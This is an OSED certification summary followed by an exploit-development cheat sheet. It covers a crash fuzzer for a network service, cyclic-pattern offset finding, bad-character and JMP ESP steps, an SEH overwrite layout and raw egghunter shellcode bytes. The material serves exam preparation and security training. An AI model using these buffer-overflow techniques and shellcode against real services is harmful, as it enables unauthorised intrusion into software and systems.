OSED
OffSec

Offensive Security Exploit Developer

Expert | 48hr exam + report | Pass: 100+ points | $1,499

Windows exploit development, custom shellcode, DEP/ASLR bypass.

Issuer: OffSec
Format: 48hr exam + report
Duration: 72 hours total
Pass Score: 100+ points
Valid For: 3y
Cheat Sheets
Buffer Overflow & SEH Methodology

Buffer Overflow — Complete Workflow

# Step 1: Fuzz to find crash length
import socket

buf = b"A" * 100
while True:
    try:
        s = socket.socket()
        s.settimeout(5)                  # a service that hangs after the crash shows up as a timeout
        s.connect(("target", 9999))
        s.sendall(b"OVERFLOW1 " + buf)
        s.recv(1024)
        s.close()
        buf += b"A" * 100                # grow the buffer by 100 bytes per round
    except OSError:                      # refused/reset connection or timeout: the service is down
        print(f"Crashed at: {len(buf)}")
        break

# Step 2: Find offset
msf-pattern_create -l 2000                  # send the pattern instead of the A's
msf-pattern_offset -l 2000 -q <EIP_VALUE>   # EIP value shown in the debugger at the crash

# Step 3: Confirm EIP control (offset from Step 2; EIP should read 42424242)
buf = b"A" * offset + b"B" * 4 + b"C" * (2000 - offset - 4)

# Step 4: Find bad chars
# !mona bytearray -b "\x00"
# Send \x01 to \xff in payload, compare with mona (!mona compare) and repeat,
# excluding each newly found bad char, until the array matches

# Step 5: Find JMP ESP (excluding bad chars)
# !mona jmp -r esp -cpb "\x00\x0a\x0d"
# Write the address little-endian: struct.pack("<I", jmp_esp_addr)
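
How the Step 2 tools work, as an added Python reimplementation for this sheet (not OffSec's or Metasploit's own code): the cyclic pattern makes every 4-byte window unique, so the value that lands in EIP pins down the offset. The EIP value 0x42307942 and the 0x39694438 case are constructed examples.

```python
import string
import struct
from typing import Optional, Union

# Character sets used by msf-pattern_create: every 3-byte triple (upper, lower, digit)
# occurs exactly once in the 26*26*10*3 = 20280-byte cycle, so any 4-byte window is unique.
_UPPER, _LOWER, _DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
CYCLE_LEN = len(_UPPER) * len(_LOWER) * len(_DIGITS) * 3


def pattern_create(length: int) -> bytes:
    """Same output as `msf-pattern_create -l <length>` for 0 < length <= 20280."""
    if not 0 < length <= CYCLE_LEN:
        raise ValueError("offsets are only unique within one 20280-byte cycle")
    out = bytearray()
    for a in _UPPER:
        for b in _LOWER:
            for c in _DIGITS:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # not reached for a valid length


def pattern_offset(query: Union[int, bytes], length: int = CYCLE_LEN) -> Optional[int]:
    """Same as `msf-pattern_offset -l <length> -q <query>`.

    A 32-bit EIP value read from the debugger is little-endian, so the bytes that
    actually sit in the buffer are its reverse (0x39694438 -> b"8Di9"); a bytes
    query is searched as-is. Returns the offset of the 4 bytes that overwrote EIP,
    or None when the value did not come from the pattern (or lies past `length`).
    """
    needle = struct.pack("<I", query) if isinstance(query, int) else bytes(query)
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    # Constructed example: crash with EIP = 0x42307942 after sending a 2000-byte pattern.
    print(pattern_create(2000)[:12])          # b'Aa0Aa1Aa2Aa3'
    print(pattern_offset(0x42307942, 2000))   # 1500
    print(pattern_offset(0x39694438, 2000))   # None: offset 2606 lies beyond a 2000-byte pattern
    print(pattern_offset(0x39694438))         # 2606
```

An EIP value of 41414141 or None from the lookup means the register was not filled from the pattern (wrong buffer field, or the crash is not a straight overwrite) and the crash needs closer triage in the debugger.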

SEH Exploit Structure

import struct

# nSEH is overwritten with a short jump over the SEH handler address (EB 06 90 90)
# SEH is overwritten with the address of a pop-pop-ret gadget

# Find pop-pop-ret (excluding bad chars)
# !mona seh -cpb "\x00\x0a\x0d"

# Exploit structure:
padding = b"A" * offset_to_nSEH        # offset_to_nSEH from the pattern step
nSEH = b"\xeb\x06\x90\x90"             # jmp short +6: skips the 2 NOPs and the 4-byte SEH address
SEH  = struct.pack("<I", ppr_addr)     # ppr_addr: pop-pop-ret address from mona, little-endian

Egghunter

# NtAccessCheckAndAuditAlarm egghunter (32 bytes)
egg = b"T0cK"   # 4-byte tag, placed twice (8 bytes); matches the immediate 0x4b633054 ("T0cK") in the hunter

egghunter = (
    # or dx,0x0fff; inc edx; push edx; push 2; pop eax; int 0x2e; cmp al,5; pop edx; je (back to or dx)
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    # ...je target; mov eax,"T0cK"; mov edi,edx; scasd; jne; scasd; jne; jmp edi
    b"\xef\xb8\x54\x30\x63\x4b\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
# Place the egghunter in the small buffer; tag + shellcode can sit anywhere else in memory
large_buf = egg * 2 + shellcode   # shellcode: the payload bytes (not part of this sheet)

WinDbg Quick Reference

.loadby sos clr       # Load SOS extension (managed/.NET targets)
lm                    # List modules
bp module!function    # Set breakpoint
g                     # Go (continue)
p                     # Step over
t                     # Step into
dd esp L10            # Display DWORDs at esp (L10 is hex: 16 values)
da eip                # Display ASCII string at eip
u eip L20             # Unassemble from eip (L20 is hex: 32 instructions)
k                     # Stack trace
!address esp          # Address info (region, protection, owning module)
!exploitable          # Check exploitability (MSEC extension)
.formats 0x625011af   # Show number in all formats

Use !mona config -set workingfolder C:\mona\%p to set per-process output folders in Immunity Debugger.